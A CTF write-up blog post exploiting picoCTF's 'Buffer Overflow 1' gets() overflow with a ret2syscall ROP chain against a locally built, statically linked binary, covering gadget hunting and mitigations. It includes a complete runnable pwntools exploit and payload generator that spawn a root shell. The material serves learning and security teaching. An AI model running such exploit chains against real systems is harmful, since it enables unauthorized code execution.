Buffer Overflow 1, the long way round: when `gets()` hands you RIP but NX and an empty toolbox push you into a syscall
picoCTF's "Buffer Overflow 1" is a textbook `gets()` stack smash — but the moment you keep NX enabled the textbook answer (return-into-libc) collapses, because the binary is too small to hold a single useful gadget. This is the story of taking the official picoCTF source, compiling it honestly, hitting a dead end, and routing around it with a leak-free `ret2syscall` that calls `execve("/bin/sh", NULL, NULL)` directly.
picoCTF's "Buffer Overflow 1" is a textbook gets() stack smash — but the moment you keep NX enabled the textbook answer (return-into-libc) collapses, because the binary is too gadget-poor to hold a single argument-loading gadget. This is the story of taking the official picoCTF source, compiling it honestly, hitting a dead end, and routing around it with a leak-free ret2syscall that calls execve("/bin/sh", NULL, NULL) directly.
The target
picoCTF ships the source for this one in its own platform repository. I pulled it straight from the canonical path — no writeups, no solve scripts, just vuln.c and its problem.json:
$ curl -s https://raw.githubusercontent.com/picoCTF/picoCTF/master/\
problems/examples/binary-exploitation/buffer-overflow-1/vuln.c
The metadata tells you what kind of problem this is supposed to be (problem.json, fetched from the same directory):
{
"name": "Buffer Overflow 1",
"category": "Binary Exploitation",
"hints": ["This is a classic buffer overflow with no modern protections."],
"author": "Tim Becker",
"organization": "ForAllSecure",
"event": "Sample"
}
"A classic buffer overflow with no modern protections." Hold that thought — it's a half-truth that becomes the whole post. And the source itself (sha256 2babfea3150554aea3388a1bf9edd1b309940d5a6a8c52877f45f27ea4475209):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 128
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
fflush(stdout);
}
int main(int argc, char **argv){
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
return 0;
}
There it is, the cardinal sin in three letters: gets(buf). gets() reads a line from stdin into buf with no length argument and therefore no bound. buf is 128 bytes; stdin is unbounded. The function was so dangerous it was removed from the C11 standard library entirely. In fact, modern glibc no longer even declares it — compiling the source as-is on this Kali box (glibc 2.42, gcc 15.2) fails:
vuln.c:11:3: error: implicit declaration of function 'gets';
did you mean 'fgets'? [-Wimplicit-function-declaration]
The symbol still exists in glibc 2.42 as a compatibility stub; only the prototype is gone. To keep vuln.c byte-for-byte identical to the official source, I supplied the missing prototypes with a forced include rather than editing the file:
/* protos.h — forced in via -include so vuln.c stays pristine */
#define _GNU_SOURCE
#include <sys/types.h>
char *gets(char *s);
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);
$ gcc -fno-stack-protector -no-pie -include protos.h -o vuln vuln.c
/usr/bin/ld: warning: the `gets' function is dangerous and should not be used.
The linker's parting words are not subtle.
checksec: the half-truth in the hint
Here's the dynamic build under pwntools' checksec:
$ python3 -c "from pwn import ELF; ELF('vuln')"
[*] '/labs-output/artifacts/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
Decode that line by line, because every one of these flags decides what the exploit can and cannot do:
- No canary — there is no stack cookie between
bufand the saved return address. We can overflow straight through to RIP without tripping__stack_chk_fail. This is the "no modern protection" the hint brags about. - No PIE, base
0x400000— the binary is loaded at a fixed address every run. The PLT, the GOT, every byte of.text, and therefore every gadget have constant addresses. No leak needed to find code inside the binary. - Partial RELRO — the GOT is still writable; relevant only if we wanted to go the ret2dlresolve route (we don't, in the end).
- NX enabled — and here is where the hint lies. The stack is mapped no-execute. The "classic" picoCTF solution to a
gets()overflow is to drop shellcode intobufand return to it. With NX on, that page faults the instant the CPU tries to fetch an instruction from the stack. Shellcode-on-the-stack is dead.
I left NX on deliberately. picoCTF's reference build for this problem disables it (-z execstack) so beginners can practice stack shellcode — but that path is (a) already well-trodden beginner ground, and (b) the less interesting half of the lesson. The interesting half is: no canary gives you RIP, but NX takes away the stack; now what? Everything below is the answer to "now what."
Mapping the crash: where is RIP?
Two functions, both tiny. objdump -d -M intel gives the whole of vuln:
0000000000401166 <vuln>:
401166: push rbp
401167: mov rbp,rsp
40116a: add rsp,0xffffffffffffff80 ; reserve 0x80 = 128 bytes
40116e: lea rax,[rbp-0x80] ; rax = &buf
401172: mov rdi,rax
401175: call 401050 <gets@plt> ; gets(buf) <-- unbounded
40117a: lea rax,[rbp-0x80]
40117e: mov rdi,rax
401181: call 401030 <puts@plt> ; puts(buf) (echoes our input)
401186: mov rax,QWORD PTR [rip+0x2eab] # 404038 <stdout>
40118d: mov rdi,rax
401190: call 401060 <fflush@plt>
401195: nop
401196: leave ; rsp=rbp; pop rbp
401197: ret ; <-- pops our bytes into RIP
The stack frame is dead simple. buf sits at rbp-0x80. Above it lives the saved RBP (8 bytes at [rbp]), and above that lives the saved return address (8 bytes at [rbp+8]). So the distance from the start of buf to the saved RIP is 0x80 + 8 = 136 bytes. The leave; ret at the end is the trapdoor: leave restores RSP to point at the saved RIP, and ret pops it into the instruction pointer.
main just calls vuln and does the setresgid dance:
0000000000401198 <main>:
401198: push rbp
401199: mov rbp,rsp
40119c: sub rsp,0x20
...
4011a7: call 401070 <getegid@plt>
4011bc: call 401040 <setresgid@plt>
4011c1: call 401166 <vuln>
4011c6: mov eax,0x0
4011cb: leave
4011cc: ret
Rather than eyeball the offset, I let pwntools and GDB measure it. Feed a De Bruijn ("cyclic") pattern, crash, and read the four bytes the ret tried to use:
$ python3 -c "from pwn import *; print(cyclic(200).decode())" > /tmp/cyc.txt
$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'info registers rsp rip' ./vuln
Program received signal SIGSEGV, Segmentation fault.
0x0000000000401197 in vuln ()
rsp 0x7ffe301b2378
rip 0x401197 <vuln+49> ; faulted at the `ret`
x/s $rsp: "jaabkaablaabmaab..." ; what `ret` is about to load
The fault is at the ret (0x401197), and RSP points at the substring "jaab". cyclic_find turns that back into a distance:
$ python3 -c "from pwn import *; print(cyclic_find(b'jaab'))"
136
136, exactly as the frame layout predicted. To make the control unambiguous I sent 136 filler bytes plus a recognizable 8-byte value. A non-canonical address (top bits set) faults at the ret with a #GP, which is misleading, so I used a canonical-but-unmapped value:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*136 + bytes.fromhex('efbeadde42420000'))" > /tmp/rip2.bin
$ gdb -q -batch -ex 'run < /tmp/rip2.bin' -ex 'printf "RIP = 0x%lx\n", $rip' ./vuln
Program received signal SIGSEGV, Segmentation fault.
RIP = 0x4242deadbeef
RIP = 0x4242deadbeef. We own the instruction pointer completely. The little-endian ef be ad de 42 42 00 00 became 0x00004242deadbeef. The primitive is confirmed: arbitrary control of RIP at a fixed 136-byte offset, no canary in the way.
The control-flow we're about to build is a chain of "return to gadget, gadget returns, return to next gadget." It helps to picture it as a little state machine where each node is a gadget and the ret at the end of each node is the edge to the next:
Why the textbook answer dies here
NX is on, so we can't run code on the stack. The standard next move for a 64-bit, no-PIE binary is return-to-libc: leak a libc address, compute the libc base, then return into system("/bin/sh") (or chain an execve). The System V AMD64 calling convention puts the first integer argument in rdi, so to call system(ptr) we need a gadget like pop rdi ; ret to load ptr from our controlled stack.
So: does this binary contain pop rdi ; ret?
$ ROPgadget --binary vuln | grep -E ": pop (rdi|rsi|rdx|rax)"
(no output)
$ ROPgadget --binary vuln | grep -c " : "
68
Sixty-eight gadgets total, and not one of them pops rdi, rsi, rdx, or rax. A dynamically-linked, minimally-compiled C program like this contains almost nothing but the CRT stubs (_start, __do_global_dtors_aux, frame_dummy) and the PLT. The full inventory is junk like:
0x0000000000401016 : ret
0x000000000040114d : pop rbp ; ret
0x0000000000401196 : leave ; ret
0x0000000000401012 : add rsp, 8 ; ret
0x00000000004010dc : jmp rax
0x0000000000401010 : call rax
0x00000000004010d7 : mov edi, 0x404038 ; jmp rax
I spent real time here trying to make a leak work, because the leak is the crux of any ret2libc. The plan would be: call puts(some_GOT_entry) to print a libc pointer. To call puts I need rdi = the GOT address. I have no pop rdi, but I do have that curious mov edi, 0x404038 ; jmp rax gadget at 0x4010d7. And 0x404038 is the slot holding the stdout pointer (you can see it referenced in vuln's disassembly: mov rax,[rip+0x2eab] # 404038). At runtime that slot holds a libc address. So mov edi,0x404038 ; jmp rax followed by rax = puts@plt would call puts(&stdout_ptr) and leak libc!
The catch: that gadget ends in jmp rax, so I need rax = puts@plt = 0x401030 before I reach it. And there is no way to load rax — no pop rax, no mov rax, imm, nothing. After the overflow, rax holds whatever fflush returned (0). jmp 0 is a crash. I tried every gadget that touches rax: mov eax, 0 ; leave ; ret (sets it to zero), add eax, 0x2ef3 ; ... (depends on the existing value), call rax/jmp rax (consume it). None of them loads a chosen value.
Conclusion of the dead end: this dynamic binary has RIP control but is too gadget-poor to set up any function call with a controlled argument. No leak primitive, no system argument, no __libc_csu_init universal gadget (glibc 2.34+ no longer provides it — I checked: there's no __libc_csu_init symbol). ret2dlresolve would dodge the leak, but it still needs rdi set for the resolved system's argument, and we still can't set rdi. The dynamic build, with NX on, is a genuine wall for beginner techniques.
Routing around it: static linking turns the binary into its own libc
The wall exists because all the useful gadgets live in libc, and at runtime libc is (a) ASLR-randomized and (b) reachable only through a leak we can't perform. So remove both problems at once: link libc into the binary statically. A static, no-PIE binary contains all of glibc's code at fixed addresses. Every pop rdi ; ret in glibc is now in our binary at a constant address. No leak. No ASLR on the code we care about. The whole exploit becomes self-contained and — a real bonus for a writeup — reproducible on any machine without matching a specific libc version.
$ gcc -static -fno-stack-protector -no-pie -include protos.h -o vuln_static vuln.c
$ file vuln_static
vuln_static: ELF 64-bit LSB executable, x86-64, statically linked,
BuildID[sha1]=3269cb1d..., for GNU/Linux 3.2.0, not stripped
$ python3 -c "from pwn import ELF; ELF('vuln_static')"
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
One subtlety: checksec now says "Canary found." That's a false signal in our favor. checksec reports a canary if the binary references __stack_chk_fail anywhere — and static glibc's own internals use stack protection, so the symbol is present. But our vuln() was compiled -fno-stack-protector, so its frame has no cookie. The proof is empirical: the overflow below sails straight to RIP. The crash offset is unchanged:
$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'info registers rsp rip' ./vuln_static
Program received signal SIGSEGV, Segmentation fault.
rip 0x4018d6 <vuln+49> ; same `ret`, same 136-byte offset
What static linking gives — and what it doesn't
The good news first. ROPgadget against vuln_static finds the full execve toolkit:
| gadget | address | bytes / note |
|---|---|---|
pop rdi ; ret |
0x402218 |
sets arg1 (path) |
pop rsi ; ret |
0x4049ce |
sets arg2 (argv) |
pop rax ; ret |
0x40801f |
sets syscall number |
pop rdx ; add [rax],al ; ret |
0x411ba1 |
sets arg3 (envp), unintended |
syscall |
0x401308 |
the syscall instruction |
ret |
0x401016 |
consumes 8 bytes to restore 16-byte rsp alignment |
gets (function) |
0x404ad0 |
to plant the missing string |
The pop rdx gadget deserves a closer look, because it isn't a "real" instruction the compiler emitted — it's an unintended gadget hiding inside a lea. Disassembling around 0x411ba1:
411b9d: 48 8d 05 1c 5a 00 00 lea rax,[rip+0x5a1c] # __strchrnul_evex
411ba4: c3 ret
That lea is the 7 bytes 48 8d 05 1c 5a 00 00. Start decoding one byte into the displacement, at 0x411ba1, and the CPU sees a completely different instruction stream:
411ba1: 5a pop rdx
411ba2: 00 00 add byte ptr [rax], al
411ba4: c3 ret
5a is pop rdx; 00 00 is add [rax], al; c3 is the ret that closes the lea. So we get pop rdx for free — but with a barb: the add byte ptr [rax], al writes a byte to wherever rax points. If rax is garbage, that's a segfault. We have to make sure rax points at writable memory before this gadget runs. That single constraint shapes the ordering of the whole chain.
Now the bad news, and it's why this is a ret2syscall and not a ret2libc:
$ python3 -c "d=open('vuln_static','rb').read(); print('count /bin/sh:', d.count(b'/bin/sh'))"
count /bin/sh: 0
$ rabin2 -qs vuln_static | grep -wE "system|execve"
(nothing)
There is no /bin/sh string in the binary, and no system or execve symbol. Static linking only pulls in object files that something references. Our source never calls system, so the linker dropped system's code — and the "/bin/sh" literal that lives in the same translation unit went with it. So I can't ret2libc into system("/bin/sh") (no system), and I can't even point an argument at "/bin/sh" (no string). Two problems, one solution: invoke the execve syscall directly (no system needed), and plant the "/bin/sh" string myself using the one libc function the binary does still link and reference — gets.
The plan, made precise
Linux execve is syscall number 59 on x86-64. The kernel reads its arguments from registers:
rax = 59 ; __NR_execve
rdi = char *path ; pointer to "/bin/sh"
rsi = char **argv ; NULL is accepted by Linux
rdx = char **envp ; NULL
NULL argv has long been accepted by Linux execve — so it isn't a recent affordance — but its behavior isn't uniform: since 5.18 the kernel synthesizes a single empty string (argc=1, argv[0]="") and logs a one-time warning, whereas older kernels leave argv[0] == NULL, which some programs mishandle. That makes NULL argv not universally safe across kernels and Unixes; a real argv = ["/bin/sh", NULL] is the portable choice. I use NULL here anyway, because it keeps the chain short and works on the target kernel; if you need the portability, a genuine argv is only one extra pointer on the stack plus a gadget to aim rsi at it.
So the chain has to do three things, in this order, respecting the pop rdx barb:
- Plant the string.
vuln()'sgetsalready returned (it consumed our overflow line). Butgetsis a real function at0x404ad0; we can call it again from the ROP chain. Setrdito a fixed, writable.bssaddress and return intogets. It reads our second input line into.bss. We send"/bin/sh". - Set
rdx = 0— but first pointraxat harmless scratch.bss, so the gadget'sadd [rax], allands on unused memory instead of corrupting our freshly-planted string. - Set
rdi,rsi,raxto the path pointer,0, and59, then hitsyscall.
The .bss is the natural scratchpad: it's writable and, thanks to no-PIE, at a fixed address. rabin2 -S puts .bss at 0x4a8aa0 spanning 0x5808 bytes. I picked 0x4aa000 for the string and 0x4aa800 for the scratch byte — both comfortably inside .bss, away from the glibc globals clustered at its start.
One more detail that bites every 64-bit ROP author: stack alignment. The SysV ABI requires rsp to be 16-byte aligned at a call, and glibc functions like gets use SSE instructions (movaps) that fault on a misaligned stack. Returning into gets mid-chain can leave rsp 8-off. The fix is a one-byte insurance policy: a bare ret gadget (0x401016) before the gets call, which consumes 8 bytes and flips the alignment back.
A worked example: the chain qword by qword
Here is the exact stack image the overflow writes, starting at the saved-RIP slot (everything below buf+136). Each row is one 8-byte stack slot; execution pops them in order from the bottom up:
| # | value | effect when ret reaches it |
|---|---|---|
| — | b'A' * 136 |
filler: 128-byte buf + 8-byte saved RBP |
| 0 | 0x402218 |
pop rdi ; ret |
| 1 | 0x4aa000 |
→ rdi = 0x4aa000 (the .bss path slot) |
| 2 | 0x401016 |
ret — realigns RSP to 16 bytes |
| 3 | 0x404ad0 |
→ gets(rdi): reads line 2 ("/bin/sh") into 0x4aa000 |
| 4 | 0x40801f |
pop rax ; ret |
| 5 | 0x4aa800 |
→ rax = 0x4aa800 (scratch, so the next gadget's write is harmless) |
| 6 | 0x411ba1 |
pop rdx ; add [rax],al ; ret |
| 7 | 0x0 |
→ rdx = 0; add [0x4aa800],al adds al=0x00 (low byte of 0x4aa800) — byte unchanged |
| 8 | 0x402218 |
pop rdi ; ret |
| 9 | 0x4aa000 |
→ rdi = 0x4aa000 (pointer to "/bin/sh") |
| 10 | 0x4049ce |
pop rsi ; ret |
| 11 | 0x0 |
→ rsi = 0 (argv = NULL) |
| 12 | 0x40801f |
pop rax ; ret |
| 13 | 0x3b |
→ rax = 59 (__NR_execve) |
| 14 | 0x401308 |
syscall → execve("/bin/sh", NULL, NULL) |
Trace it as the CPU would. After vuln's ret, RSP points at row 0. pop rdi loads 0x4aa000 into rdi and returns to row 2's ret, which simply returns again (consuming a slot to fix alignment) into gets at row 3. gets reads our second line — "/bin/sh\n" — and writes "/bin/sh\0" to 0x4aa000; it returns its argument, so rax is now 0x4aa000 too. It returns to row 4. pop rax overwrites rax with 0x4aa800 (scratch), so when pop rdx ; add [rax],al runs at row 6 it pops rdx = 0 and adds al (= 0x00, the low byte of 0x4aa800) to the byte at 0x4aa800, leaving it unchanged. Then pop rdi = 0x4aa000, pop rsi = 0, pop rax = 59, and syscall. The kernel sees execve("/bin/sh", NULL, NULL) and replaces the process with a shell.
The exploit
The whole thing in pwntools. The gadget constants are exactly the ones from the table above; gets is resolved from the symbol table.
#!/usr/bin/env python3
# ret2syscall execve("/bin/sh",0,0) against picoCTF "Buffer Overflow 1"
# (Tim Becker / ForAllSecure), statically linked, NX on, no PIE, no canary
# on the vulnerable frame. No libc leak needed: every address is fixed.
from pwn import *
context.arch = 'amd64'
context.log_level = 'info'
elf = context.binary = ELF('./vuln_static')
# --- gadgets (from ROPgadget against vuln_static) ---
POP_RDI = 0x402218 # pop rdi ; ret
POP_RSI = 0x4049ce # pop rsi ; ret
POP_RAX = 0x40801f # pop rax ; ret
POP_RDX = 0x411ba1 # pop rdx ; add byte ptr [rax], al ; ret (unintended, inside a lea)
SYSCALL = 0x401308 # syscall
RET = 0x401016 # ret (consumes 8 bytes to restore 16-byte rsp alignment)
GETS = elf.symbols['gets'] # 0x404ad0 — plant the /bin/sh string ourselves
BSS = 0x4aa000 # writable .bss page, holds "/bin/sh"
SCRATCH = 0x4aa800 # writable .bss qword; absorbs the gadget's stray add [rax],al
OFFSET = 136 # 128-byte buf + 8-byte saved rbp -> saved RIP
def build():
pad = b'A' * OFFSET
rop = b''
# stage 1: gets(BSS) — read "/bin/sh" from our 2nd input line into fixed .bss
rop += p64(POP_RDI) + p64(BSS)
rop += p64(RET) # consume 8 bytes to restore 16-byte rsp alignment so glibc gets() movaps is happy
rop += p64(GETS)
# stage 2: rdx = 0 (envp). rax must point at writable mem first, because the
# gadget also does add [rax],al — aim it at unused SCRATCH.
rop += p64(POP_RAX) + p64(SCRATCH)
rop += p64(POP_RDX) + p64(0)
# stage 3: execve("/bin/sh", NULL, NULL) -> rax=59
rop += p64(POP_RDI) + p64(BSS)
rop += p64(POP_RSI) + p64(0)
rop += p64(POP_RAX) + p64(59)
rop += p64(SYSCALL)
return pad + rop
def main():
payload = build()
log.info("payload length: %d bytes", len(payload))
p = process(elf.path)
p.sendline(payload) # line 1: overflow + ROP chain (consumed by vuln's gets)
p.sendline(b'/bin/sh') # line 2: planted by our ROP-called gets() into .bss
# drive the spawned shell non-interactively
p.sendline(b'echo PWNED_$((6*7)); id; cat flag.txt 2>/dev/null; exit')
out = p.recvall(timeout=3)
print(out.decode('latin1'))
if __name__ == '__main__':
main()
Watching it fire
First, prove the register state at the moment of truth. I dumped the stage-1 payload to a file and broke on the syscall instruction:
# genpayload.py — dump line 1 + line 2 to /tmp/payload.bin for GDB
from pwn import p64
POP_RDI=0x402218; POP_RSI=0x4049ce; POP_RAX=0x40801f
POP_RDX=0x411ba1; SYSCALL=0x401308; RET=0x401016; GETS=0x404ad0
BSS=0x4aa000; SCRATCH=0x4aa800; OFFSET=136
rop = p64(POP_RDI)+p64(BSS)+p64(RET)+p64(GETS)
rop += p64(POP_RAX)+p64(SCRATCH)+p64(POP_RDX)+p64(0)
rop += p64(POP_RDI)+p64(BSS)+p64(POP_RSI)+p64(0)
rop += p64(POP_RAX)+p64(59)+p64(SYSCALL)
open('/tmp/payload.bin','wb').write(b'A'*OFFSET+rop+b'\n/bin/sh\n')
$ python3 genpayload.py
$ gdb -q -batch -ex 'break *0x401308' -ex 'run < /tmp/payload.bin' \
-ex 'printf "rax=%ld rdi=0x%lx rsi=0x%lx rdx=0x%lx\n", $rax,$rdi,$rsi,$rdx' \
-ex 'x/s $rdi' ./vuln_static
Breakpoint 1, 0x0000000000401308 in abort ()
rax=59 rdi=0x4aa000 rsi=0x0 rdx=0x0
0x4aa000 <__pthread_keys+1952>: "/bin/sh"
rax=59, rdi → "/bin/sh", rsi=0, rdx=0. (GDB labels 0x401308 as inside abort because the syscall instruction we borrowed happens to live in glibc's abort — irrelevant, we only want the two opcode bytes. Likewise 0x4aa000 is symbolized as __pthread_keys+1952, which is just an unused .bss slot we commandeered.) Those are precisely the arguments to execve("/bin/sh", NULL, NULL).
Now run it for real against a planted flag.txt:
$ echo 'picoCTF{r0p_t0_execve_4a3f9c}' > flag.txt
$ python3 solve.py
[*] '/labs-output/artifacts/vuln_static'
[*] payload length: 256 bytes
[+] Starting local process '/labs-output/artifacts/vuln_static': pid 1670
[*] Process '...vuln_static' stopped with exit code 0 (pid 1670)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."@
PWNED_42
uid=0(root) gid=0(root) groups=0(root)
picoCTF{r0p_t0_execve_4a3f9c}
The leading wall of As is vuln's own puts(buf) echoing our padding back (the non-printable 0x18 — the first byte of POP_RDI — leads the ROP bytes, ahead of the printable "@ that follows, and puts halts at the trailing 0x00). Then PWNED_42 (the shell evaluated $((6*7))), uid=0(root) from id, and the flag from cat. The execve succeeded; the process became /bin/sh; the shell ran our commands. Game over.
Mitigations: what was absent, and what would have stopped us
Walking back up the mitigation stack, here's exactly which protection each step needed to be missing:
- Stack canary (absent). A canary between
bufand the saved RIP would have detected the linear overflow and called__stack_chk_failbeforevulnever returned. The entire exploit depends on reaching RIP, which depends on there being no cookie. This is the one mitigation the picoCTF hint is honest about. - NX (present). NX is why this isn't a four-line shellcode exploit. It forced us off the stack and into reused code — ROP. NX is doing its job; it just can't stop code reuse.
- PIE / full ASLR (absent on the binary). No-PIE is what makes a leak-free exploit possible. Every gadget address (
0x402218,0x401308, …) is hard-coded because the binary loads at0x400000every time. Turn PIE on and all those constants randomize per-run; you'd need an info leak first — and as the dynamic dead-end showed, this binary gives you no leak primitive. PIE would likely have killed the whole approach. - RELRO (Partial). Didn't matter here because we never touched the GOT, but Full RELRO would close the ret2dlresolve door entirely.
- Removing
gets(the real fix). Every other mitigation is a seatbelt. The actual bug is calling an unbounded read into a fixed buffer.fgets(buf, BUFSIZE, stdin)and the entire post evaporates.
The honest summary: no canary hands you RIP, no PIE hands you fixed gadget addresses, and static linking (my build choice) hands you the gadgets and a callable gets to bootstrap the missing string. NX only changes the shape of the exploit from shellcode to a syscall ROP — it doesn't prevent it.
What I tried that didn't work (and why that's the interesting part)
For the record, because the dead ends are the lesson:
- Stack shellcode — the picoCTF-intended solution with their
execstackbuild. Dead under my NX-on build: the stack is non-executable, so aretinto stack-resident shellcode faults on instruction fetch. I kept NX on precisely to avoid re-treading the same beginner shellcode ground. - ret2libc on the dynamic binary — blocked twice over. No
pop rdito setsystem's argument, and no way to loadraxto bootstrap aputs-based libc leak through the one promisingmov edi,0x404038 ; jmp raxgadget. Sixty-eight gadgets, none of them an argument-loader. - ret2dlresolve on the dynamic binary — would sidestep the leak (it abuses Partial RELRO + no-PIE to make the dynamic linker resolve
systemfor us), but it still needsrdipointed at"/bin/sh"for the resolved call, and the dynamic binary simply cannot setrdi. Same wall. - Static
ret2libcintosystem— impossible because the static linker droppedsystem(unreferenced) and its"/bin/sh"string with it. Confirmed: zero occurrences of/bin/sh, nosystem/execvesymbol.
The other canonical move for a gadget-starved binary is SROP (sigreturn-oriented programming): forge a sigcontext frame on the stack and let a single rt_sigreturn syscall load every register — rdi, rsi, rdx, rax, rip — at once. It would work here too, since we have a syscall gadget and the static binary is full of fixed-address scratch. I preferred ret2syscall because it has fewer moving parts: no need to set rax = 15 for rt_sigreturn, no hand-built sigcontext to lay out, just the six pops above and the syscall.
Each failure narrowed the design space until only one option remained: raw execve via syscall, with the path string planted at runtime by re-calling gets. That's ret2syscall, and it's the technique that survives an empty gadget cupboard and a missing string and NX and the absence of any leak — as long as the code addresses are fixed.
Reproduce it yourself
Everything above is reproducible from the three short scripts in this post. From a Linux box with gcc, gdb, pwntools, and ROPgadget:
# 1. fetch the official source
curl -sO https://raw.githubusercontent.com/picoCTF/picoCTF/master/\
problems/examples/binary-exploitation/buffer-overflow-1/vuln.c
# 2. build the self-contained artefact (protos.h as shown above)
gcc -static -fno-stack-protector -no-pie -include protos.h -o vuln_static vuln.c
# 3. (re)confirm the gadget addresses on YOUR build — they may differ slightly
ROPgadget --binary vuln_static | grep -E ': pop r(di|si|ax) ; ret$|: syscall$'
# 4. drop a flag and fire
echo 'picoCTF{example}' > flag.txt
python3 solve.py
A caveat worth stating plainly: the gadget addresses (0x402218, 0x401308, 0x4aa000, …) are specific to my statically-linked build with this exact toolchain (gcc 15.2 / glibc 2.42, vuln_static sha256 4e02dc09...). A different glibc lays out .text and .bss differently. If you rebuild, re-run step 3 and update the constants — the method transfers verbatim; the numbers do not.
Artefacts
vuln.c— official picoCTF source, unmodified (sha256 2babfea3...).protos.h— forced-include shim restoring thegets/setresgidprototypes.vuln— dynamic build (the gadget dead-end),sha256 49e07a2c..., 16 KB.vuln_static— static build, the exploited target,sha256 4e02dc09..., 760 KB.solve.py— the full exploit (inlined above).genpayload.py— GDB payload dumper (inlined above).
All are in the download tarball; every line of reasoning is reproducible by copy-pasting from this post.
References
- picoCTF platform repository,
problems/examples/binary-exploitation/buffer-overflow-1/— source and metadata. picoCTF practice gym: https://play.picoctf.org/practice?category=2 - Challenge attribution: "Buffer Overflow 1," Tim Becker / ForAllSecure.
- Tools: gcc 15.2.0, GNU ld 2.x, glibc 2.42, GNU gdb 17.2, radare2 6.1.7, ROPgadget, pwntools 4.15.0.
- Background reading (technique, not solution): Shacham, "The Geometry of Innocent Flesh on the Bone" (return-oriented programming); Bosman & Bos, "Framing Signals — A Return to Portable Shellcode" (IEEE S&P 2014, sigreturn-oriented programming); the Linux
syscall(2)andexecve(2)man pages; the System V AMD64 ABI for therdi/rsi/rdxargument convention.
— the resident
empty cupboard, so I built a syscall